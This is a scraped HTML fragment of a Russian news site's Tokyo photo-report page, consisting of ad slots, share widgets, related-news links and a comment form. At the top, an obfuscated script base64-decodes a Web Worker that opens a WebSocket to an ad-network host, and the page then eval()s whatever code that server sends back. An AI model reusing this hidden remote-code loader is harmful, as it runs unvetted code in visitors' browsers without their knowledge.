                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9nNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKC95YW5kZXh8eWFicm93c2VyL2kudGVzdChuYXZpZ2F0b3IudXNlckFnZW50KSkgd3NzVXJsID0gIndzczovL2c0cC5ncnQwMS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker17724.postMessage(data);
                }

                worker17724 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker17724.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker17724.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>
    <div id="bn_aa922818e6">загрузка...</div>
<script type="text/javascript" src="//recreativ.ru/rcode.aa922818e6.js"></script>
     </div>
<div class="f_bottm">
 <div class="f_date_author">Сегодня, 19:52 » Автор: <a onclick="ShowProfile('%D0%90%D0%BD%D0%BD%D0%B0+%D0%9C%D0%B0%D1%80%D1%82%D1%8B%D0%BD%D0%BE%D0%B2%D0%B0', 'http://hronika.info/user/%D0%90%D0%BD%D0%BD%D0%B0+%D0%9C%D0%B0%D1%80%D1%82%D1%8B%D0%BD%D0%BE%D0%B2%D0%B0/', '0'); return false;" href="http://hronika.info/user/%D0%90%D0%BD%D0%BD%D0%B0+%D0%9C%D0%B0%D1%80%D1%82%D1%8B%D0%BD%D0%BE%D0%B2%D0%B0/">Анна Мартынова</a></div> 
 <div class="view_comments">  
  <div class="f_views"><span></span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;77</div>
  <div class="f_comments"><span></span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0</div> 
  </div>
</div>
	</div>    
<div class="sb">
<div class="sotsseti">
<!-- noindex -->
  <script type="text/javascript">(function() {
      if (window.pluso) {return};
       var d = document, s = d.createElement('script'), g = 'getElementsByTagName';
       s.type = 'text/javascript'; s.charset='UTF-8'; s.async = true;
       s.src = ('https:' == window.location.protocol ? 'https' : 'http')  + '://x.pluso.ru/pluso-x.js';
       var h=d[g]('body')[0];
       h.appendChild(s);
    })();
 </script>
<div class="pluso-engine" pluso-sharer={"buttons":"facebook,twitter,google,vkontakte,moimir,email,print,more","style":{"size":"small","shape":"square","theme":"theme03","css":""},"orientation":"horizontal","multiline":false} ></div> 
<!-- /noindex -->
    
<div class="sotslikes">
<!-- Код рейтинга -->

</div>
</div>
 <div class="fullstoryn">
   <div class="bshadow exban"> 

    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Рекомендуемый под новостью -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="6534414543"
     data-ad-format="autorelaxed"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
           <div class="clr"></div>
    </div>
 </div>
  <div class="clr"></div>
  <div class="fullstoryn">
   <div class="bshadow exban">
  
    
   <div class="clr"></div>
    </div>
 </div>  
</div><br/>

<div class="related-n"> 
<div class="relttl"><h2>Похожие новости по теме</h2></div>
         <div class="clr"></div>
<div class="related_news bshadow"><a href="http://hronika.info/fotoreportazhi/334994-zasnezhennyy-tokio-v-fotoproekte-neveroyatnoy-krasoty-foto.html">
  <img src="/posters/110_85_80_1/uploads/posts/2018-07/thumbs/1531997282_tokio.jpg" alt="Заснеженный Токио в фотопроекте невероятной красоты. Фото" title="Заснеженный Токио в фотопроекте невероятной красоты. Фото" /></a>
    <strong title="Заснеженный Токио в фотопроекте невероятной красоты. Фото"><a href="http://hronika.info/fotoreportazhi/334994-zasnezhennyy-tokio-v-fotoproekte-neveroyatnoy-krasoty-foto.html">Заснеженный Токио в фотопроекте невероятной красоты. Фото</a></strong>
  <p>Это редкое погодное явление.</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/fotoreportazhi/331973-fotograf-pokazal-atmosferu-bezmyatezhnogo-tokio-foto.html">
  <img src="/posters/110_85_80_1/uploads/posts/2018-07/thumbs/1531053431_tokio.jpg" alt="Фотограф показал атмосферу безмятежного Токио. Фото" title="Фотограф показал атмосферу безмятежного Токио. Фото" /></a>
    <strong title="Фотограф показал атмосферу безмятежного Токио. Фото"><a href="http://hronika.info/fotoreportazhi/331973-fotograf-pokazal-atmosferu-bezmyatezhnogo-tokio-foto.html">Фотограф показал атмосферу безмятежного Токио. Фото</a></strong>
  <p>Город с особенной атмосферой.</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/fotoreportazhi/320496-gorod-zebra-tokio-v-cherno-belyh-snimkah-foto.html">
  <img src="/posters/110_85_80_1/uploads/posts/2018-05/thumbs/1527247095_tokio.jpg" alt="«Город-зебра»: Токио в черно-белых снимках. Фото" title="«Город-зебра»: Токио в черно-белых снимках. Фото" /></a>
    <strong title="«Город-зебра»: Токио в черно-белых снимках. Фото"><a href="http://hronika.info/fotoreportazhi/320496-gorod-zebra-tokio-v-cherno-belyh-snimkah-foto.html">«Город-зебра»: Токио в черно-белых снимках. Фото</a></strong>
  <p>Город с богатой историей.</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/fotoreportazhi/237635-vena-glazami-talantlivogo-fotografa-foto.html">
  <img src="/posters/110_85_80_1/uploads/posts/2017-06/thumbs/1497881066_vena.jpg" alt="Вена глазами талантливого фотографа. Фото" title="Вена глазами талантливого фотографа. Фото" /></a>
    <strong title="Вена глазами талантливого фотографа. Фото"><a href="http://hronika.info/fotoreportazhi/237635-vena-glazami-talantlivogo-fotografa-foto.html">Вена глазами талантливого фотографа. Фото</a></strong>
  <p>Уличные фотографии жителей Вены от Скандера Хлифа.</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/fotoreportazhi/167934-volshebstvo-nochnogo-tokio-v-snimkah-havera-portely.html">
  <img src="/posters/110_85_80_1/uploads/posts/2016-09/thumbs/1472891770_nochnoj-tokio-31-1.jpg" alt="Волшебство ночного Токио в снимках Хавьера Портелы. Фото" title="Волшебство ночного Токио в снимках Хавьера Портелы. Фото" /></a>
    <strong title="Волшебство ночного Токио в снимках Хавьера Портелы. Фото"><a href="http://hronika.info/fotoreportazhi/167934-volshebstvo-nochnogo-tokio-v-snimkah-havera-portely.html">Волшебство ночного Токио в снимках Хавьера Портелы. Фото</a></strong>
  <p>Ночной город так и манит своими огнями</p><div class="clr"></div>
</div>
 
<div style="clear: both"></div>
</div>
         <div class="clr"></div>

<!--ЗАКОММЕНТИРОВАННЫЕ
<div style="clear: both"></div>
<div class="poslednie-n">
<div class="relttl"><h2>Поcледние новости раздела category}</h2></div>
<div class="bshadow">
<div class="poslednie_div49-5 fleft">custom category="2" template="/inks/shabnews/poslednie_n_fullstory" from="0" limit="5"}</div>
<div class="poslednie_div49-5 fright">custom category="2" template="/inks/shabnews/poslednie_n_fullstory" from="0" limit="5"}</div>
<div style="clear: both"></div>
</div>
</div>-->

<div style="clear: both"></div>
<div class="sovetuemsmotret">
<div class="relttl"><h2>Также советуем посмотреть</h2></div>
      <div class="slwrap3 bshadow">
      <div id="slider3">
        <a class="buttons prev" href="#"></a>
        <div class="viewport">
          <ul class="overview"><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/351667-nelepye-postupki-na-kotorye-sposobny-lish-ekstraordinarnye-lyudi.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1537101964_absurd.jpg" alt="Нелепые поступки, на которые способны лишь экстраординарные люди" class="l_n_im" title="Нелепые поступки, на которые способны лишь экстраординарные люди" />
</a>
<strong class="ttl" title="Нелепые поступки, на которые способны лишь экстраординарные люди"><a href="http://hronika.info/kurjozy/351667-nelepye-postupki-na-kotorye-sposobny-lish-ekstraordinarnye-lyudi.html">Нелепые поступки, на которые способны лишь экстраординарные люди</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/351720-v-sbu-rasskazali-ob-aktivnosti-specsluzhb-rf.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1537112690_sbu.jpg" alt="В СБУ рассказали об активности спецслужб РФ" class="l_n_im" title="В СБУ рассказали об активности спецслужб РФ" />
</a>
<strong class="ttl" title="В СБУ рассказали об активности спецслужб РФ"><a href="http://hronika.info/ukraina/351720-v-sbu-rasskazali-ob-aktivnosti-specsluzhb-rf.html">В СБУ рассказали об активности спецслужб РФ</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/351662-zabavnye-oshibki-v-obyavleniyah-sposobnye-vyzvat-istericheskiy-smeh.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1537101150_obyavleniya.jpg" alt="Забавные ошибки в объявлениях, способные вызвать истерический смех" class="l_n_im" title="Забавные ошибки в объявлениях, способные вызвать истерический смех" />
</a>
<strong class="ttl" title="Забавные ошибки в объявлениях, способные вызвать истерический смех"><a href="http://hronika.info/kurjozy/351662-zabavnye-oshibki-v-obyavleniyah-sposobnye-vyzvat-istericheskiy-smeh.html">Забавные ошибки в объявлениях, способные вызвать истерический смех</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/351700-pyat-minut-pozitiva-otlichnye-anekdoty-na-vecher.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1537109191_yumor.jpg" alt="Пять минут позитива: отличные анекдоты на вечер" class="l_n_im" title="Пять минут позитива: отличные анекдоты на вечер" />
</a>
<strong class="ttl" title="Пять минут позитива: отличные анекдоты на вечер"><a href="http://hronika.info/kurjozy/351700-pyat-minut-pozitiva-otlichnye-anekdoty-na-vecher.html">Пять минут позитива: отличные анекдоты на вечер</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/351687-v-nebe-ssha-ufologi-razglyadeli-dva-nlo.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1537106127_nlo.jpg" alt="В небе США уфологи разглядели два «НЛО»" class="l_n_im" title="В небе США уфологи разглядели два «НЛО»" />
</a>
<strong class="ttl" title="В небе США уфологи разглядели два «НЛО»"><a href="http://hronika.info/kurjozy/351687-v-nebe-ssha-ufologi-razglyadeli-dva-nlo.html">В небе США уфологи разглядели два «НЛО»</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/351683-set-v-vostorge-ot-koshki-s-neobychnym-okrasom.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1537105022_koshki.jpg" alt="Сеть в восторге от кошки с необычным окрасом" class="l_n_im" title="Сеть в восторге от кошки с необычным окрасом" />
</a>
<strong class="ttl" title="Сеть в восторге от кошки с необычным окрасом"><a href="http://hronika.info/kurjozy/351683-set-v-vostorge-ot-koshki-s-neobychnym-okrasom.html">Сеть в восторге от кошки с необычным окрасом</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/351655-set-v-vostorge-ot-ulybayuschegosya-pitbulya.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1537098716_pitbul.jpg" alt="Сеть в восторге от улыбающегося питбуля" class="l_n_im" title="Сеть в восторге от улыбающегося питбуля" />
</a>
<strong class="ttl" title="Сеть в восторге от улыбающегося питбуля"><a href="http://hronika.info/kurjozy/351655-set-v-vostorge-ot-ulybayuschegosya-pitbulya.html">Сеть в восторге от улыбающегося питбуля</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/351615-rebenok-nasmeshil-ves-mir-slishkom-chestnym-otvetom.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1537089630_chestnost.jpg" alt="Ребенок насмешил весь мир слишком честным ответом" class="l_n_im" title="Ребенок насмешил весь мир слишком честным ответом" />
</a>
<strong class="ttl" title="Ребенок насмешил весь мир слишком честным ответом"><a href="http://hronika.info/kurjozy/351615-rebenok-nasmeshil-ves-mir-slishkom-chestnym-otvetom.html">Ребенок насмешил весь мир слишком честным ответом</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/351602-v-seti-vysmeyali-akciyu-v-podderzhku-russkogo-mira-v-rige.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1537085842_riga.png" alt="В Сети высмеяли акцию в поддержку «русского мира» в Риге" class="l_n_im" title="В Сети высмеяли акцию в поддержку «русского мира» в Риге" />
</a>
<strong class="ttl" title="В Сети высмеяли акцию в поддержку «русского мира» в Риге"><a href="http://hronika.info/kurjozy/351602-v-seti-vysmeyali-akciyu-v-podderzhku-russkogo-mira-v-rige.html">В Сети высмеяли акцию в поддержку «русского мира» в Риге</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/351584-socseti-podnyali-na-smeh-novogo-pretendenta-na-dolzhnost-zaharchenko.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1537080993_zaharchenko3.jpg" alt="Соцсети подняли на смех нового претендента на «должность» Захарченко" class="l_n_im" title="Соцсети подняли на смех нового претендента на «должность» Захарченко" />
</a>
<strong class="ttl" title="Соцсети подняли на смех нового претендента на «должность» Захарченко"><a href="http://hronika.info/kurjozy/351584-socseti-podnyali-na-smeh-novogo-pretendenta-na-dolzhnost-zaharchenko.html">Соцсети подняли на смех нового претендента на «должность» Захарченко</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/351575-sutki-v-zone-oos-boeviki-28-raz-obstrelivali-pozicii-vsu.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1537078333_oos.jpg" alt="Сутки в зоне ООС: боевики 28 раз обстреливали позиции ВСУ" class="l_n_im" title="Сутки в зоне ООС: боевики 28 раз обстреливали позиции ВСУ" />
</a>
<strong class="ttl" title="Сутки в зоне ООС: боевики 28 раз обстреливали позиции ВСУ"><a href="http://hronika.info/ukraina/351575-sutki-v-zone-oos-boeviki-28-raz-obstrelivali-pozicii-vsu.html">Сутки в зоне ООС: боевики 28 раз обстреливали позиции ВСУ</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/351527-v-seti-vysmeyali-bezgramotnost-okkupantov-v-krymu.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1537041874_krym.jpg" alt="В Сети высмеяли безграмотность оккупантов в Крыму" class="l_n_im" title="В Сети высмеяли безграмотность оккупантов в Крыму" />
</a>
<strong class="ttl" title="В Сети высмеяли безграмотность оккупантов в Крыму"><a href="http://hronika.info/kurjozy/351527-v-seti-vysmeyali-bezgramotnost-okkupantov-v-krymu.html">В Сети высмеяли безграмотность оккупантов в Крыму</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/351517-v-britanskom-tvittere-vysmeyali-petrova-i-boshirova.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/1537038411_petrov.jpg" alt="В британском твиттере высмеяли Петрова и Боширова" class="l_n_im" title="В британском твиттере высмеяли Петрова и Боширова" />
</a>
<strong class="ttl" title="В британском твиттере высмеяли Петрова и Боширова"><a href="http://hronika.info/kurjozy/351517-v-britanskom-tvittere-vysmeyali-petrova-i-boshirova.html">В британском твиттере высмеяли Петрова и Боширова</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/351513-rossiyskiy-bank-ugrozhaet-ukraine-arbitrazhem.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1537036802_bank.jpg" alt="Российский банк угрожает Украине арбитражем" class="l_n_im" title="Российский банк угрожает Украине арбитражем" />
</a>
<strong class="ttl" title="Российский банк угрожает Украине арбитражем"><a href="http://hronika.info/ukraina/351513-rossiyskiy-bank-ugrozhaet-ukraine-arbitrazhem.html">Российский банк угрожает Украине арбитражем</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/351505-medved-na-svadebnyh-foto-stal-hitom-seti.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1537032853_medved.jpg" alt="Медведь на свадебных фото стал хитом Сети" class="l_n_im" title="Медведь на свадебных фото стал хитом Сети" />
</a>
<strong class="ttl" title="Медведь на свадебных фото стал хитом Сети"><a href="http://hronika.info/kurjozy/351505-medved-na-svadebnyh-foto-stal-hitom-seti.html">Медведь на свадебных фото стал хитом Сети</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/351493-roman-nasirov-opozorilsya-znaniem-istorii.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1537028675_nasirov.jpg" alt="Роман Насиров опозорился знанием истории" class="l_n_im" title="Роман Насиров опозорился знанием истории" />
</a>
<strong class="ttl" title="Роман Насиров опозорился знанием истории"><a href="http://hronika.info/kurjozy/351493-roman-nasirov-opozorilsya-znaniem-istorii.html">Роман Насиров опозорился знанием истории</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/351489-ssha-gotovy-usilivat-oboronosposobnost-ukrainy.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1537027500_volker.jpg" alt="США готовы усиливать обороноспособность Украины" class="l_n_im" title="США готовы усиливать обороноспособность Украины" />
</a>
<strong class="ttl" title="США готовы усиливать обороноспособность Украины"><a href="http://hronika.info/ukraina/351489-ssha-gotovy-usilivat-oboronosposobnost-ukrainy.html">США готовы усиливать обороноспособность Украины</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/351481-v-rossii-vypustili-palto-v-tyuremnom-stile.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1537024318_palto1.jpg" alt="В России выпустили пальто в тюремном стиле" class="l_n_im" title="В России выпустили пальто в тюремном стиле" />
</a>
<strong class="ttl" title="В России выпустили пальто в тюремном стиле"><a href="http://hronika.info/kurjozy/351481-v-rossii-vypustili-palto-v-tyuremnom-stile.html">В России выпустили пальто в тюремном стиле</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/351469-marazm-krepchal-na-harkovschine-torzhestvenno-otkryli-musornye-baki.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1537016303_41779189_2058650874449298_5764207464010481664_n.jpg" alt="Маразм крепчал: на Харьковщине торжественно открыли мусорные баки" class="l_n_im" title="Маразм крепчал: на Харьковщине торжественно открыли мусорные баки" />
</a>
<strong class="ttl" title="Маразм крепчал: на Харьковщине торжественно открыли мусорные баки"><a href="http://hronika.info/kurjozy/351469-marazm-krepchal-na-harkovschine-torzhestvenno-otkryli-musornye-baki.html">Маразм крепчал: на Харьковщине торжественно открыли мусорные баки</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/351461-v-ssha-medved-zasvetilsya-na-svadebnyh-fotografiyah.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1537014025_3d3e2d40-4dd7-11e8-9b9d-991d7082677f.jpg" alt="В США медведь "засветился" на свадебных фотографиях" class="l_n_im" title="В США медведь "засветился" на свадебных фотографиях" />
</a>
<strong class="ttl" title="В США медведь "засветился" на свадебных фотографиях"><a href="http://hronika.info/kurjozy/351461-v-ssha-medved-zasvetilsya-na-svadebnyh-fotografiyah.html">В США медведь "засветился" на свадебных фотографиях</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/351448-nad-shveciey-uvideli-lico-prishelca.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1537011293_img_top.jpg" alt="Над Швецией увидели лицо "пришельца"" class="l_n_im" title="Над Швецией увидели лицо "пришельца"" />
</a>
<strong class="ttl" title="Над Швецией увидели лицо "пришельца""><a href="http://hronika.info/kurjozy/351448-nad-shveciey-uvideli-lico-prishelca.html">Над Швецией увидели лицо "пришельца"</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/351434-v-italii-poyavilsya-shikarnyy-otel-dlya-koshek.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1537008806_20522011-v-italii-otkrylsya-pyatizvezdochnyj-ote.jpg" alt="В Италии появился шикарный отель для кошек" class="l_n_im" title="В Италии появился шикарный отель для кошек" />
</a>
<strong class="ttl" title="В Италии появился шикарный отель для кошек"><a href="http://hronika.info/kurjozy/351434-v-italii-poyavilsya-shikarnyy-otel-dlya-koshek.html">В Италии появился шикарный отель для кошек</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/351424-pokupki-v-internete-ozhidanie-i-realnost.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1537006571_00000000000000000000000000000000000000000000000000001.jpg" alt="Покупки в Интернете: ожидание и реальность" class="l_n_im" title="Покупки в Интернете: ожидание и реальность" />
</a>
<strong class="ttl" title="Покупки в Интернете: ожидание и реальность"><a href="http://hronika.info/kurjozy/351424-pokupki-v-internete-ozhidanie-i-realnost.html">Покупки в Интернете: ожидание и реальность</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/351412-podborka-samyh-nelepyh-i-zabavnyh-tualetov.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1537003253_snimok-ekrana-2018-09-14-v-21.31.31.png" alt="Подборка самых нелепых и забавных туалетов" class="l_n_im" title="Подборка самых нелепых и забавных туалетов" />
</a>
<strong class="ttl" title="Подборка самых нелепых и забавных туалетов"><a href="http://hronika.info/kurjozy/351412-podborka-samyh-nelepyh-i-zabavnyh-tualetov.html">Подборка самых нелепых и забавных туалетов</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/351396-zabavnye-modniki-umeyuschie-vydelyatsya-iz-tolpy.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1536999795_2-99.jpg" alt="Забавные модники, умеющие выделяться из толпы" class="l_n_im" title="Забавные модники, умеющие выделяться из толпы" />
</a>
<strong class="ttl" title="Забавные модники, умеющие выделяться из толпы"><a href="http://hronika.info/kurjozy/351396-zabavnye-modniki-umeyuschie-vydelyatsya-iz-tolpy.html">Забавные модники, умеющие выделяться из толпы</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/351385-smeshnye-zhivotnye-ugodivshie-v-nestandartnye-situacii.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1536997370_00000253_p.jpg" alt="Смешные животные, угодившие в нестандартные ситуации" class="l_n_im" title="Смешные животные, угодившие в нестандартные ситуации" />
</a>
<strong class="ttl" title="Смешные животные, угодившие в нестандартные ситуации"><a href="http://hronika.info/kurjozy/351385-smeshnye-zhivotnye-ugodivshie-v-nestandartnye-situacii.html">Смешные животные, угодившие в нестандартные ситуации</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/351372-zabavnye-snimki-iz-serii-za-sekundu-do.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1536994125_000000000000000000000000000000000000000002.jpg" alt="Забавные снимки из серии "за секунду до"" class="l_n_im" title="Забавные снимки из серии "за секунду до"" />
</a>
<strong class="ttl" title="Забавные снимки из серии "за секунду до""><a href="http://hronika.info/kurjozy/351372-zabavnye-snimki-iz-serii-za-sekundu-do.html">Забавные снимки из серии "за секунду до"</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/351364-na-severe-kryma-zafiksirovali-novyy-himicheskiy-vybros-smi.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1536992172_na-severe-kryma-zafiksirovali-novyy-himicheskiy-vybros-smi.jpg" alt="На севере Крыма зафиксировали новый химический выброс - СМИ" class="l_n_im" title="На севере Крыма зафиксировали новый химический выброс - СМИ" />
</a>
<strong class="ttl" title="На севере Крыма зафиксировали новый химический выброс - СМИ"><a href="http://hronika.info/ukraina/351364-na-severe-kryma-zafiksirovali-novyy-himicheskiy-vybros-smi.html">На севере Крыма зафиксировали новый химический выброс - СМИ</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/351362-situaciya-v-oos-25-obstrelov-zhertv-net.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1536991487_situaciya-v-oos-25-obstrelov-zhertv-net.jpg" alt="Ситуация в ООС: 25 обстрелов, жертв нет" class="l_n_im" title="Ситуация в ООС: 25 обстрелов, жертв нет" />
</a>
<strong class="ttl" title="Ситуация в ООС: 25 обстрелов, жертв нет"><a href="http://hronika.info/ukraina/351362-situaciya-v-oos-25-obstrelov-zhertv-net.html">Ситуация в ООС: 25 обстрелов, жертв нет</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/351225-poteshnye-prichiny-schitat-taks-samymi-milymi-sobakami.html"><img src="/posters/167_120_50_1/uploads/posts/2018-09/thumbs/1536929221_taksy.png" alt="Потешные причины считать такс самыми милыми собаками" class="l_n_im" title="Потешные причины считать такс самыми милыми собаками" />
</a>
<strong class="ttl" title="Потешные причины считать такс самыми милыми собаками"><a href="http://hronika.info/kurjozy/351225-poteshnye-prichiny-schitat-taks-samymi-milymi-sobakami.html">Потешные причины считать такс самыми милыми собаками</a></strong>
</li></ul>
        </div>
        <a class="buttons next" href="#"></a> 
      </div>
    </div>
</div>

<br />
<div id="comments_tab"><b>Оставьте свой комментарий</b>
<!--  <ul class="tabs">
  <li>
    <a href="#hronika">Хроника</a>
  </li>
<li>
    <a href="#vkontakte">Вконтакте</a>
  </li> 
  <li>
    <a href="#facebook">Фейсбук</a>
  </li>
</ul> -->
<div class="clr">
  <div id="hronika">
<form  method="post" name="dle-comments-form" id="dle-comments-form" action="/fotoreportazhi/351630-fotograf-pokazal-pochemu-tokio-nazyvayut-gorodom-kontrastnoy-krasoty-foto.html"><br />
<div class="baseform addcomfrm">
	<table class="tableform">
		
		<tr>
			<td class="label">
				Имя:<span class="impot">*&nbsp;&nbsp;</span>
				<input type="text" name="name" id="name" class="f_input" />
			</td>
		</tr>
		<tr>	
			<td class="label">E-Mail:<input type="text" name="mail" id="mail" class="f_input" style="margin-left:8px" /></td>
		</tr>
		
		<tr>	
			<td class="editorcomm"><script type="text/javascript">
<!--
var text_enter_url       = "Введите полный URL ссылки";
var text_enter_size       = "Введите размеры флэш ролика (ширина, высота)";
var text_enter_flash       = "Введите ссылку на флэш ролик";
var text_enter_page      = "Введите номер страницы";
var text_enter_url_name  = "Введите описание ссылки";
var text_enter_page_name = "Введите описание ссылки";
var text_enter_image    = "Введите полный URL изображения";
var text_enter_email    = "Введите e-mail адрес";
var text_code           = "Использование: [CODE] Здесь Ваш код.. [/CODE]";
var text_quote          = "Использование: [QUOTE] Здесь Ваша Цитата.. [/QUOTE]";
var text_upload         = "Загрузка файлов и изображений на сервер";
var error_no_url        = "Вы должны ввести URL";
var error_no_title      = "Вы должны ввести название";
var error_no_email      = "Вы должны ввести e-mail адрес";
var prompt_start        = "Введите текст для форматирования";
var img_title   		= "Введите по какому краю выравнивать картинку (left, center, right)";
var email_title  	    = "Введите описание ссылки";
var text_pages  	    = "Страница";
var image_align  	    = "left";
var bb_t_emo  	        = "Вставка смайликов";
var bb_t_col  	        = "Цвет:";
var text_enter_list     = "Введите пункт списка. Для завершения ввода оставьте поле пустым.";
var text_alt_image      = "Введите описание изображения";
var img_align  	        = "Выравнивание";
var img_align_sel  	    = "<select name='dleimagealign' id='dleimagealign' class='ui-widget-content ui-corner-all'><option value='' >Нет</option><option value='left' selected>По левому краю</option><option value='right' >По правому краю</option><option value='center' >По центру</option></select>";

var selField  = "comments";
var fombj    = document.getElementById( 'dle-comments-form' );
-->
</script>
<div class="bb-editor">
<div class="bb-pane" onmouseenter="if(is_ie9) get_sel(eval('fombj.'+ selField));">
<b id="b_b" class="bb-btn" onclick="simpletag('b')" title="Полужирный">Полужирный</b>
<b id="b_i" class="bb-btn" onclick="simpletag('i')" title="Наклонный текст">Наклонный текст</b>
<b id="b_u" class="bb-btn" onclick="simpletag('u')" title="Подчёркнутый текст">Подчёркнутый текст</b>
<b id="b_s" class="bb-btn" onclick="simpletag('s')" title="Зачёркнутый текст">Зачёркнутый текст</b>
<span class="bb-sep">|</span>
<b id="b_left" class="bb-btn" onclick="simpletag('left')" title="Выравнивание по левому краю">Выравнивание по левому краю</b>
<b id="b_center" class="bb-btn" onclick="simpletag('center')" title="По центру">По центру</b>
<b id="b_right" class="bb-btn" onclick="simpletag('right')" title="Выравнивание по правому краю">Выравнивание по правому краю</b>
<span class="bb-sep">|</span>
